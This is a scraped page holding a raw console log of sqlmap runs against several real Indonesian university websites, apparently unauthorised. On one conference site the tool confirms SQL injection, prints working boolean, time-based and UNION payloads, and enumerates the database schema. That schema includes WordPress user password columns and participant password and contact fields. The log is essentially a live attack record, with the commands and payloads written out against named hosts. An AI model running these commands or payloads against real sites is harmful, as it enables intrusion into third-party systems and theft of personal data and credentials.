Elite

August 15, 2017 | Author: HarisDwiS | Category: Sql, Microsoft Sql Server, Oracle Database, Table (Database), Postgre Sql
Share Embed Donate


Short Description

sqli...

Description

Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>cd.. C:\Windows>cd.. C:\>python27/sqlmap/sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc h --dbs 'python27' is not recognized as an internal or external command, operable program or batch file. C:\>Python27/sqlmap/sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc h --dbs 'Python27' is not recognized as an internal or external command, operable program or batch file. C:\>Python27/sqlmap/sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc h --dbs 'Python27' is not recognized as an internal or external command, operable program or batch file. C:\>Python27\sqlmap\sqlmap.py -u http://www.aknsumenep.ac.id/pp.php?id=28 --batc h --dbs ___ __H__ ___ ___[(]_____ ___ ___ {1.0.12.14#dev} |_ -| . ['] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of consent is illegal. It is the local, state and federal laws. sible for any misuse or damage

sqlmap for attacking targets without prior mutual end user's responsibility to obey all applicable Developers assume no liability and are not respon caused by this program

[*] starting at 01:44:23 [01:44:23] [INFO] testing connection to the target URL [01:44:24] [INFO] checking if the target is protected by some kind of WAF/IPS/ID S [01:44:24] [INFO] testing if the target URL is stable [01:44:24] [INFO] target URL is stable [01:44:24] [INFO] testing if GET parameter 'id' is dynamic [01:44:25] [WARNING] GET parameter 'id' does not appear to be dynamic [01:44:25] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable [01:44:25] [INFO] testing for SQL injection on GET parameter 'id' [01:44:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [01:44:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' [01:44:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (FLOOR)' [01:44:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [01:44:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [01:44:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [01:44:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [01:44:26] [INFO] testing 'MySQL inline queries' [01:44:26] [INFO] testing 'PostgreSQL inline queries'

[01:44:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [01:44:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [01:44:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment) ' [01:44:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c omment)' [01:44:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [01:44:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [01:44:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [01:44:28] [INFO] testing 'Oracle AND time-based blind' [01:44:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [01:44:28] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it with option '--dbms' [01:44:31] [WARNING] GET parameter 'id' does not seem to be injectable [01:44:31] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to r erun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment') [*] shutting down at 01:44:31 C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30&mn=4 --ba tch --dbs ___ __H__ ___ ___[(]_____ ___ ___ {1.0.12.14#dev} |_ -| . ["] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of consent is illegal. It is the local, state and federal laws. sible for any misuse or damage

sqlmap for attacking targets without prior mutual end user's responsibility to obey all applicable Developers assume no liability and are not respon caused by this program

[*] starting at 01:44:55 [01:44:55] [INFO] testing connection to the target URL [01:44:56] [INFO] checking if the target is protected by some kind of WAF/IPS/ID S [01:44:57] [INFO] testing if the target URL is stable [01:44:57] [INFO] target URL is stable [01:44:57] [INFO] testing if GET parameter 'id' is dynamic [01:44:58] [INFO] confirming that GET parameter 'id' is dynamic [01:44:58] [INFO] GET parameter 'id' is dynamic [01:44:59] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST ['id'])") at the back-end web application do you want to skip those kind of cases (and save scanning time)? [y/N] n [01:45:05] [INFO] testing for SQL injection on GET parameter 'id' [01:45:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [01:45:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' [01:45:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (FLOOR)' [01:45:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [01:45:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [01:45:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)'

[01:45:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [01:45:18] [INFO] testing 'MySQL inline queries' [01:45:18] [INFO] testing 'PostgreSQL inline queries' [01:45:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [01:45:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [01:45:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment) ' [01:45:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c omment)' [01:45:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [01:45:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [01:45:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [01:45:29] [INFO] testing 'Oracle AND time-based blind' [01:45:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [01:45:31] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it with option '--dbms' [01:45:59] [WARNING] GET parameter 'id' does not seem to be injectable [01:45:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to r erun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment') [*] shutting down at 01:45:59 'mn' is not recognized as an internal or external command, operable program or batch file. C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30&mn=4 --ba tch --dbms ___ __H__ ___ ___["]_____ ___ ___ {1.0.12.14#dev} |_ -| . ["] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of consent is illegal. It is the local, state and federal laws. sible for any misuse or damage

sqlmap for attacking targets without prior mutual end user's responsibility to obey all applicable Developers assume no liability and are not respon caused by this program

[*] starting at 01:46:11 [01:46:11] [INFO] testing connection to the target URL [01:46:12] [INFO] testing if the target URL is stable [01:46:13] [INFO] target URL is stable [01:46:13] [INFO] testing if GET parameter 'id' is dynamic [01:46:13] [INFO] confirming that GET parameter 'id' is dynamic [01:46:13] [INFO] GET parameter 'id' is dynamic [01:46:14] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST ['id'])") at the back-end web application do you want to skip those kind of cases (and save scanning time)? [y/N] n [01:46:21] [INFO] testing for SQL injection on GET parameter 'id' [01:46:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [01:46:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' [01:46:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (FLOOR)' [01:46:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [01:46:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o

r HAVING clause (IN)' [01:46:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [01:46:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [01:46:35] [INFO] testing 'MySQL inline queries' [01:46:36] [INFO] testing 'PostgreSQL inline queries' [01:46:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [01:46:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [01:46:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment) ' [01:46:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c omment)' [01:46:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [01:46:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [01:46:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [01:46:49] [INFO] testing 'Oracle AND time-based blind' [01:46:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [01:46:51] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it with option '--dbms' [01:47:15] [WARNING] GET parameter 'id' does not seem to be injectable [01:47:15] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to r erun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment') [*] shutting down at 01:47:15 'mn' is not recognized as an internal or external command, operable program or batch file. C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30 --batch -dbms ___ __H__ ___ ___[.]_____ ___ ___ {1.0.12.14#dev} |_ -| . ["] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V |_| http://sqlmap.org Usage: sqlmap.py [options] sqlmap.py: error: --dbms option requires an argument Press Enter to continue... C:\>Python27\sqlmap\sqlmap.py -u https://pmb.usd.ac.id/index.php?id=30 --batch -dbs ___ __H__ ___ ___[,]_____ ___ ___ {1.0.12.14#dev} |_ -| . [(] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of consent is illegal. It is the local, state and federal laws. sible for any misuse or damage

sqlmap for attacking targets without prior mutual end user's responsibility to obey all applicable Developers assume no liability and are not respon caused by this program

[*] starting at 01:47:32 [01:47:33] [INFO] testing connection to the target URL [01:47:33] [INFO] testing if the target URL is stable [01:47:34] [INFO] target URL is stable [01:47:34] [INFO] testing if GET parameter 'id' is dynamic [01:47:34] [INFO] confirming that GET parameter 'id' is dynamic [01:47:34] [INFO] GET parameter 'id' is dynamic [01:47:35] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST ['id'])") at the back-end web application do you want to skip those kind of cases (and save scanning time)? [y/N] N [01:47:36] [INFO] testing for SQL injection on GET parameter 'id' [01:47:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [01:47:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' [01:47:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (FLOOR)' [01:47:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [01:47:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause (IN)' [01:47:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [01:47:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [01:47:47] [INFO] testing 'MySQL inline queries' [01:47:48] [INFO] testing 'PostgreSQL inline queries' [01:47:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [01:47:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [01:47:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment) ' [01:47:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c omment)' [01:47:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [01:47:54] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [01:47:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [01:48:00] [INFO] testing 'Oracle AND time-based blind' [01:48:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [01:48:02] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it with option '--dbms' [01:48:24] [WARNING] GET parameter 'id' does not seem to be injectable [01:48:24] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to r erun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment') [*] shutting down at 01:48:24 C:\>Python27\sqlmap\sqlmap.py -u http://elite.event.uinjkt.ac.id/acs/pages/abstr act.php?id=78 --batch --dbs ___ __H__ ___ ___[(]_____ ___ ___ {1.0.12.14#dev} |_ -| . [)] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of consent is illegal. It is the local, state and federal laws. sible for any misuse or damage

sqlmap for attacking targets without prior mutual end user's responsibility to obey all applicable Developers assume no liability and are not respon caused by this program

[*] starting at 09:42:03 [09:42:04] [INFO] testing connection to the target URL [09:42:05] [INFO] heuristics detected web page charset 'ISO-8859-2' [09:42:05] [INFO] checking if the target is protected by some kind of WAF/IPS/ID S [09:42:05] [INFO] testing if the target URL is stable [09:42:05] [INFO] target URL is stable [09:42:05] [INFO] testing if GET parameter 'id' is dynamic [09:42:06] [INFO] confirming that GET parameter 'id' is dynamic [09:42:06] [INFO] GET parameter 'id' is dynamic [09:42:06] [INFO] heuristics detected web page charset 'ascii' [09:42:06] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable [09:42:06] [INFO] testing for SQL injection on GET parameter 'id' [09:42:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [09:42:08] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WH ERE or HAVING clause' injectable (with --string="OF") [09:42:10] [INFO] heuristic (extended) test shows that the back-end DBMS could b e 'MySQL' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp ecific for other DBMSes? [Y/n] Y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [09:42:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (BIGINT UNSIGNED)' [09:42:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B IGINT UNSIGNED)' [09:42:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (EXP)' [09:42:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E XP)' [09:42:10] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [09:42:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)' [09:42:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (FLOOR)' [09:42:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [09:42:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (EXTRACTVALUE)' [09:42:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [09:42:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (UPDATEXML)' [09:42:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' [09:42:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause (FLOOR)' [09:42:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (F LOOR)' [09:42:12] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR) ' [09:42:12] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT VALUE)' [09:42:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [09:42:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'

[09:42:12] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_ KEYS)' [09:42:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [09:42:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX ML)' [09:42:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT VALUE)' [09:42:12] [INFO] testing 'MySQL inline queries' [09:42:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' [09:42:12] [INFO] testing 'MySQL > 5.0.11 stacked queries' [09:42:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment )' [09:42:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)' [09:42:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment )' [09:42:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:42:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [09:42:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-bas ed blind' injectable [09:42:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [09:42:23] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [09:42:24] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extendi ng the range for current UNION query injection technique test [09:42:25] [INFO] target URL appears to have 18 columns in query [09:42:30] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 co lumns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any )? [y/N] N sqlmap identified the following injection point(s) with a total of 94 HTTP(s) re quests: --Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=78' AND 1350=1350 AND 'nfbT'='nfbT Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=78' AND SLEEP(5) AND 'FSHp'='FSHp Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: id=-4733' UNION ALL SELECT CONCAT(0x7178767671,0x474470787245636c45 51664c765a556476556f6568617062506f66676d674751726e574a53507155,0x71716b6b71),NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L-- tIAT --[09:42:31] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.12 [09:42:31] [INFO] fetching database names [09:42:31] [INFO] the SQL query used returns 2 entries [09:42:32] [INFO] retrieved: information_schema [09:42:32] [INFO] retrieved: elite available databases [2]: [*] elite [*] information_schema

[09:42:32] [INFO] fetched data logged to text files under 'C:\Users\SRS\.sqlmap\ output\elite.event.uinjkt.ac.id' [*] shutting down at 09:42:32 C:\>Python27\sqlmap\sqlmap.py -u http://elite.event.uinjkt.ac.id/acs/pages/abstr act.php?id=78 -D elite --batch --columns ___ __H__ ___ ___[(]_____ ___ ___ {1.0.12.14#dev} |_ -| . [.] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of consent is illegal. It is the local, state and federal laws. sible for any misuse or damage

sqlmap for attacking targets without prior mutual end user's responsibility to obey all applicable Developers assume no liability and are not respon caused by this program

[*] starting at 09:43:06 [09:43:07] [INFO] resuming back-end DBMS 'mysql' [09:43:07] [INFO] testing connection to the target URL [09:43:07] [INFO] heuristics detected web page charset 'ISO-8859-2' sqlmap resumed the following injection point(s) from stored session: --Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=78' AND 1350=1350 AND 'nfbT'='nfbT Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=78' AND SLEEP(5) AND 'FSHp'='FSHp Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: id=-4733' UNION ALL SELECT CONCAT(0x7178767671,0x474470787245636c45 51664c765a556476556f6568617062506f66676d674751726e574a53507155,0x71716b6b71),NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L-- tIAT --[09:43:07] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.12 [09:43:07] [INFO] fetching tables for database: 'elite' [09:43:08] [INFO] the SQL query used returns 20 entries [09:43:08] [INFO] retrieved: tbl_abstract [09:43:09] [INFO] retrieved: tbl_files [09:43:09] [INFO] retrieved: tbl_paper_reviewer [09:43:10] [INFO] retrieved: tbl_participants [09:43:10] [INFO] retrieved: tbl_reviewer [09:43:11] [INFO] retrieved: tbl_system [09:43:12] [INFO] retrieved: tbl_topic [09:43:12] [INFO] retrieved: tbl_visitors [09:43:12] [INFO] retrieved: wp_commentmeta [09:43:13] [INFO] retrieved: wp_comments [09:43:14] [INFO] retrieved: wp_links [09:43:14] [INFO] retrieved: wp_options

[09:43:14] [09:43:15] [09:43:16] [09:43:16] [09:43:17] [09:43:17] [09:43:18] [09:43:18] [09:43:18] [09:43:19] [09:43:19] [09:43:20] [09:43:20] [09:43:21] [09:43:21] [09:43:22] [09:43:22] [09:43:23] [09:43:23] [09:43:24] [09:43:24] [09:43:25] [09:43:25] [09:43:26] [09:43:26] [09:43:27] [09:43:27] [09:43:28] [09:43:28] [09:43:28] [09:43:29] [09:43:29] [09:43:30] [09:43:30] [09:43:31] [09:43:31] [09:43:32] [09:43:32] [09:43:33] [09:43:33] [09:43:34] [09:43:34] [09:43:35] [09:43:35] te' [09:43:35] [09:43:36] [09:43:36] [09:43:37] [09:43:37] [09:43:38] [09:43:38] [09:43:39] [09:43:39] [09:43:40] [09:43:40] [09:43:41] [09:43:41] [09:43:41] lite'

[INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO]

retrieved: wp_postmeta retrieved: wp_posts retrieved: wp_term_relationships retrieved: wp_term_taxonomy retrieved: wp_termmeta retrieved: wp_terms retrieved: wp_usermeta retrieved: wp_users fetching columns for table 'tbl_abstract' in database 'elite' the SQL query used returns 18 entries retrieved: "id","int(10)" retrieved: "uid","varchar(255)" retrieved: "date","varchar(255)" retrieved: "time","varchar(255)" retrieved: "ip","varchar(255)" retrieved: "hostname","varchar(255)" retrieved: "uid_owner","varchar(255)" retrieved: "title","text" retrieved: "authors","text" retrieved: "institutions","text" retrieved: "content","text" retrieved: "keywords","varchar(255)" retrieved: "topic","varchar(255)" retrieved: "last_update","varchar(255)" retrieved: "accepted","varchar(1)" retrieved: "payment","varchar(255)" retrieved: "code1","varchar(255)" retrieved: "presenter","varchar(255)" fetching columns for table 'wp_links' in database 'elite' the SQL query used returns 13 entries retrieved: "link_id","bigint(20) unsigned" retrieved: "link_url","varchar(255)" retrieved: "link_name","varchar(255)" retrieved: "link_image","varchar(255)" retrieved: "link_target","varchar(25)" retrieved: "link_description","varchar(255)" retrieved: "link_visible","varchar(20)" retrieved: "link_owner","bigint(20) unsigned" retrieved: "link_rating","int(11)" retrieved: "link_updated","datetime" retrieved: "link_rel","varchar(255)" retrieved: "link_notes","mediumtext" retrieved: "link_rss","varchar(255)" fetching columns for table 'wp_term_taxonomy' in database 'eli

[INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO]

the SQL query used returns 6 entries retrieved: "term_taxonomy_id","bigint(20) unsigned" retrieved: "term_id","bigint(20) unsigned" retrieved: "taxonomy","varchar(32)" retrieved: "description","longtext" retrieved: "parent","bigint(20) unsigned" retrieved: "count","bigint(20)" fetching columns for table 'wp_postmeta' in database 'elite' the SQL query used returns 4 entries retrieved: "meta_id","bigint(20) unsigned" retrieved: "post_id","bigint(20) unsigned" retrieved: "meta_key","varchar(255)" retrieved: "meta_value","longtext" fetching columns for table 'tbl_paper_reviewer' in database 'e

[09:43:41] [09:43:42] [09:43:42] [09:43:43] [09:43:43] [09:43:44] [09:43:44] [09:43:44] [09:43:45] [09:43:45] [09:43:46] [09:43:46] [09:43:47] [09:43:47] [09:43:48] [09:43:48] [09:43:49] [09:43:49] [09:43:50] [09:43:50] [09:43:50] [09:43:50] [09:43:51] [09:43:51] [09:43:52] [09:43:52] [09:43:52] [09:43:52] [09:43:53] [09:43:53] [09:43:53] [09:43:53] te' [09:43:54] [09:43:54] [09:43:54] [09:43:54] [09:43:55] [09:43:55] [09:43:55] [09:43:55] [09:43:55] [09:43:56] [09:43:56] [09:43:57] [09:43:57] [09:43:58] [09:43:58] [09:43:59] [09:43:59] [09:44:00] [09:44:00] [09:44:01] [09:44:01] [09:44:02] [09:44:02] [09:44:03] [09:44:03] [09:44:04] [09:44:04]

[INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO]

the SQL query used returns 6 entries retrieved: "id","int(255)" retrieved: "uid","varchar(255)" retrieved: "paper_uid","varchar(255)" retrieved: "reviewer_uid","varchar(255)" retrieved: "review","text" retrieved: "reviewer_name","varchar(255)" fetching columns for table 'wp_users' in database 'elite' the SQL query used returns 10 entries retrieved: "ID","bigint(20) unsigned" retrieved: "user_login","varchar(60)" retrieved: "user_pass","varchar(255)" retrieved: "user_nicename","varchar(50)" retrieved: "user_email","varchar(100)" retrieved: "user_url","varchar(100)" retrieved: "user_registered","datetime" retrieved: "user_activation_key","varchar(255)" retrieved: "user_status","int(11)" retrieved: "display_name","varchar(250)" fetching columns for table 'wp_terms' in database 'elite' the SQL query used returns 4 entries retrieved: "term_id","bigint(20) unsigned" retrieved: "name","varchar(200)" retrieved: "slug","varchar(200)" retrieved: "term_group","bigint(10)" fetching columns for table 'wp_usermeta' in database 'elite' the SQL query used returns 4 entries retrieved: "umeta_id","bigint(20) unsigned" retrieved: "user_id","bigint(20) unsigned" retrieved: "meta_key","varchar(255)" retrieved: "meta_value","longtext" fetching columns for table 'tbl_participants' in database 'eli

[INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO] [INFO]

the SQL query used returns 26 entries retrieved: "id","int(255)" retrieved: "uid","varchar(255)" retrieved: "userid","varchar(255)" retrieved: "password2","varchar(255)" retrieved: "date","varchar(255)" retrieved: "time","varchar(255)" retrieved: "ip","varchar(255)" retrieved: "hostname","varchar(255)" retrieved: "name1","varchar(255)" retrieved: "name2","varchar(255)" retrieved: "name3","varchar(255)" retrieved: "title","varchar(255)" retrieved: "institution","text" retrieved: "street","varchar(255)" retrieved: "city","varchar(255)" retrieved: "zipcode","varchar(255)" retrieved: "country","varchar(255)" retrieved: "phone","varchar(255)" retrieved: "fax","varchar(255)" retrieved: "email","varchar(255)" retrieved: "registered","varchar(255)" retrieved: "fee","varchar(255)" retrieved: "info","text" retrieved: "from_internal","varchar(255)" retrieved: "is_presenter","varchar(255)" retrieved: "procbook","varchar(255)"

[09:44:04] [09:44:05] [09:44:05] [09:44:06] [09:44:06] [09:44:07] [09:44:07] [09:44:07] [09:44:08] [09:44:08] [09:44:09] [09:44:09] [09:44:10] [09:44:10] [09:44:11] [09:44:11] [09:44:12] [09:44:12] [09:44:13] [09:44:13] [09:44:14] [09:44:14] [09:44:14] [09:44:15] [09:44:15] [09:44:15] [09:44:15] [09:44:16] [09:44:16] [09:44:17] [09:44:17] [09:44:17] [09:44:17] [09:44:18] [09:44:18] [09:44:18] [09:44:18] [09:44:18] [09:44:19] [09:44:19] [09:44:19] [09:44:19] [09:44:20] [09:44:20] [09:44:20] [09:44:20] [09:44:21] [09:44:21] [09:44:22] [09:44:22] [09:44:23] [09:44:23] [09:44:24] [09:44:24] [09:44:24] [09:44:25] [09:44:25] [09:44:26] [09:44:26] [09:44:27]

